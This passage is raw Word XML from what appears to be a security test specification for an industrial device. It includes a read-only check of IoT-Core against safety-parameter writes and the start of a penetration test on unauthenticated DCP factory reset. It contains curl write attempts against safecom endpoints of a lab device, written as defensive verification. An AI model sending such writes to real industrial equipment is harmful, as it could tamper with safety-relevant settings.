    </w:p>
    <w:p w14:paraId="12D61D11" w14:textId="1CA55A4F" w:rsidR="00CF00AD" w:rsidRPr="00483B71" w:rsidRDefault="00CF00AD" w:rsidP="00CF00AD">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00483B71">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">TC-RQ011-01 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>- I</w:t>
      </w:r>
      <w:r w:rsidRPr="00483B71">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>oT-Core Write-Path Blocked (Read-Only Confirmation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EAC4B6A" w14:textId="77777777" w:rsidR="00CF00AD" w:rsidRDefault="00CF00AD" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57FF7ED9"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02D1BA6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B23BBF" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="73AB0452"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1105D8B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2E8913A" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Test Case ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F18446C" w14:textId="238FD718" w:rsidR="00B73A1A" w:rsidRPr="00105368" w:rsidRDefault="008C448C" w:rsidP="008C448C">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="1277"/>
              </w:tabs>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TC-RQ011-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="001604A0" w14:paraId="22A95FC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85803DB"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5398A972" w14:textId="180DE102" w:rsidR="00B73A1A" w:rsidRPr="00105368" w:rsidRDefault="004604E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105368">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:t>RQ-011 (EHSR 1.1.9) → CR 2.1 → Asset B</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00D67CA6" w14:paraId="46C9E81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CCBF5E" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Target Threat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="07D66413" w14:textId="364B975A" w:rsidR="00B73A1A" w:rsidRPr="00105368" w:rsidRDefault="0055727E" w:rsidP="0055727E">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="4498"/>
              </w:tabs>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Tampering</w:t>
            </w:r>
            <w:r w:rsidRPr="00105368">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w14:paraId="3F11AA6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AD9CD97" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="20B0F0C6" w14:textId="229D81AB" w:rsidR="00B73A1A" w:rsidRPr="00105368" w:rsidRDefault="007E09B6"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SVV-1 (Requirements-based Testing)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00EE7A74" w14:paraId="7F9711A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C22BE6" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Objective</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6B1AD62B" w14:textId="705CB697" w:rsidR="00B73A1A" w:rsidRPr="00105368" w:rsidRDefault="00DA442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Confirm the design intent that safety-relevant parameters cannot be written via IoT-Core (read-only), so the IoT path is not an authorization bypass.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00EE7A74" w14:paraId="0F47A0E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18C1771" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Steps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="357DA43E" w14:textId="77777777" w:rsidR="00D46084" w:rsidRPr="00105368" w:rsidRDefault="00D46084" w:rsidP="00D46084">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="4261"/>
              </w:tabs>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 xml:space="preserve">1. Enumerate writable-looking IoT-Core endpoints. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58D5DDDA" w14:textId="77777777" w:rsidR="00D46084" w:rsidRPr="00105368" w:rsidRDefault="00D46084" w:rsidP="00D46084">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="4261"/>
              </w:tabs>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 xml:space="preserve">2. Attempt HTTP writes (PUT/POST/SETDATA) to safety-relevant nodes </w:t>
            </w:r>
            <w:r w:rsidRPr="00105368">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">(/safecom/*, iPar-related). </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="566C2EAE" w14:textId="3012B5D1" w:rsidR="00B73A1A" w:rsidRPr="00105368" w:rsidRDefault="00D46084" w:rsidP="00D46084">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="4261"/>
              </w:tabs>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3. Confirm each is rejected / read-only.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00EE7A74" w14:paraId="3A077CF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F39F25" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Pass/Fail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5F02812A" w14:textId="77777777" w:rsidR="007656B9" w:rsidRPr="00105368" w:rsidRDefault="007656B9"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 xml:space="preserve">PASS if all safety-parameter write attempts via IoT-Core are refused (read-only enforced). </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="222D2C41" w14:textId="7E221786" w:rsidR="00B73A1A" w:rsidRPr="00105368" w:rsidRDefault="007656B9"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FAIL if any safety parameter is writable via IoT-Core.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4C52419C" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRPr="00AF57B2" w:rsidRDefault="00B73A1A" w:rsidP="00B73A1A">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AABDFC2"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7BAA3F8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EB3C008" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="50DAF9B4"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170124F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54601B" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Ref. Test Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="38F7D708" w14:textId="0E870EDD" w:rsidR="00B73A1A" w:rsidRPr="00105368" w:rsidRDefault="00DA31A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TC-RQ011-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00F15AEA" w14:paraId="6CA5A2D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F440D9" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HW/Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D79669C" w14:textId="77777777" w:rsidR="00465074" w:rsidRPr="00105368" w:rsidRDefault="00465074" w:rsidP="00465074">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="4558"/>
              </w:tabs>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 xml:space="preserve">DUT 192.168.0.2; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79619A48" w14:textId="77777777" w:rsidR="00465074" w:rsidRPr="00105368" w:rsidRDefault="00465074" w:rsidP="00465074">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="4558"/>
              </w:tabs>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 xml:space="preserve">Pi mgmt eth1 = 192.168.50.10; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="326876E3" w14:textId="15625B9F" w:rsidR="00B73A1A" w:rsidRPr="00105368" w:rsidRDefault="00465074" w:rsidP="00465074">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="4558"/>
              </w:tabs>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browser 192.168.50.20</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00EE7A74" w14:paraId="6B7C13E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6479FB" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0EA85972" w14:textId="02446780" w:rsidR="00B73A1A" w:rsidRPr="00105368" w:rsidRDefault="00790D9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curl (write attempts), IoT-Core visualizer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00EE7A74" w14:paraId="033D25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1536B4" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Procedure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5EA2E054" w14:textId="77777777" w:rsidR="00847D14" w:rsidRPr="00105368" w:rsidRDefault="00847D14" w:rsidP="00847D1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 TC-RQ011-01 Attempt safety-parameter writes via IoT-Core (expect read-only)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2984EB8E" w14:textId="77777777" w:rsidR="00847D14" w:rsidRPr="00105368" w:rsidRDefault="00847D14" w:rsidP="00847D1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curl -s -X POST http://192.168.0.2/safecom/f_address -d 'value=42' -w '\n%{http_code}\n'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B4D75C8" w14:textId="77777777" w:rsidR="00847D14" w:rsidRPr="00105368" w:rsidRDefault="00847D14" w:rsidP="00847D1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curl -s -X PUT http://192.168.0.2/deviceinfo/swrevision -d 'value=9.9' -w '\n%{http_code}\n'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52E05581" w14:textId="15AC79A3" w:rsidR="00B73A1A" w:rsidRPr="00105368" w:rsidRDefault="00847D14" w:rsidP="00847D1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 expect: rejected / method not allowed / read-only (SRIO-8299, SRIO-7908)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00EE7A74" w14:paraId="4F884D5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E5F7A7" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Expected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="205A9EBC" w14:textId="1F0677C9" w:rsidR="00B73A1A" w:rsidRPr="00105368" w:rsidRDefault="00752526"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All writes refused (IoT-Core read-only; parameter writes removed from IoT path).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00AD4B09" w14:paraId="71A6ECF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B0BE18A" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51D84A4A" w14:textId="61790D54" w:rsidR="00B73A1A" w:rsidRPr="00105368" w:rsidRDefault="00D851C6"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105368">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Read-only enforced</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00FD6890" w14:paraId="3FE0882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DCE79E" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2FCD5138" w14:textId="77777777" w:rsidR="00DA34E3" w:rsidRPr="00105368" w:rsidRDefault="00DA34E3" w:rsidP="00DA34E3">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="6205"/>
              </w:tabs>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 xml:space="preserve">TC1101_iot_write.txt (HTTP codes), </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54AE5ADC" w14:textId="1F12D049" w:rsidR="00B73A1A" w:rsidRPr="00105368" w:rsidRDefault="00DA34E3" w:rsidP="00DA34E3">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="6205"/>
              </w:tabs>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Visualizer screenshot</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0728DBAE" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="257D9BEE" w14:textId="77777777" w:rsidR="00AB13AD" w:rsidRDefault="00AB13AD" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C4D45F2" w14:textId="77777777" w:rsidR="00AB13AD" w:rsidRDefault="00AB13AD" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D79FCBF" w14:textId="348BB041" w:rsidR="00AB13AD" w:rsidRDefault="00230B52" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00483B71">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">TC-RQ011-02 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00483B71">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Unauthenticated DCP Factory-Reset of Communication Config</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143D8BC3" w14:textId="77777777" w:rsidR="00233097" w:rsidRDefault="00233097" w:rsidP="00233097">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233097" w14:paraId="506B0FA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276A7E" w14:textId="77777777" w:rsidR="00233097" w:rsidRDefault="00233097" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B2D3585" w14:textId="77777777" w:rsidR="0023309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233097" w14:paraId="1252EB0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64529F4" w14:textId="77777777" w:rsidR="00233097" w:rsidRDefault="00233097" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Test Case ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="166741C5" w14:textId="3AE22ED4" w:rsidR="00233097" w:rsidRPr="006E4D50" w:rsidRDefault="000E633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TC-RQ011-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00233097" w:rsidRPr="00EE7A74" w14:paraId="738CBA9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20F1176" w14:textId="77777777" w:rsidR="00233097" w:rsidRDefault="00233097" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Traceability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="671D8BE5" w14:textId="1DC9A923" w:rsidR="00233097" w:rsidRPr="006E4D50" w:rsidRDefault="002F34F6"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RQ-011 → CR 1.2 / CR 2.1 → Asset G, Asset F, Asset B</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00233097" w:rsidRPr="00D67CA6" w14:paraId="5A3EEA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8DF09FE" w14:textId="77777777" w:rsidR="00233097" w:rsidRDefault="00233097" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Target Threat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F8F5F12" w14:textId="5362CA14" w:rsidR="00233097" w:rsidRPr="006E4D50" w:rsidRDefault="00F32F8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Spoofing + Elevation of Privilege</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00233097" w14:paraId="3FB52CB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AB78D8A" w14:textId="77777777" w:rsidR="00233097" w:rsidRDefault="00233097" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2EBDBAD4" w14:textId="21667CB5" w:rsidR="00233097" w:rsidRPr="006E4D50" w:rsidRDefault="006A0792" w:rsidP="006A0792">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="4884"/>
              </w:tabs>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SVV-4 (Penetration Testing)</w:t>
            </w:r>
            <w:r w:rsidRPr="006E4D50">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00233097" w:rsidRPr="00EE7A74" w14:paraId="75FE0CB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81FA58" w14:textId="77777777" w:rsidR="00233097" w:rsidRDefault="00233097" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Objective</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="296DD7D7" w14:textId="52CDB3B3" w:rsidR="00233097" w:rsidRPr="006E4D50" w:rsidRDefault="0035471B" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E4D50">
              <w:rPr>
                <w:color w:val="EE0000"/>
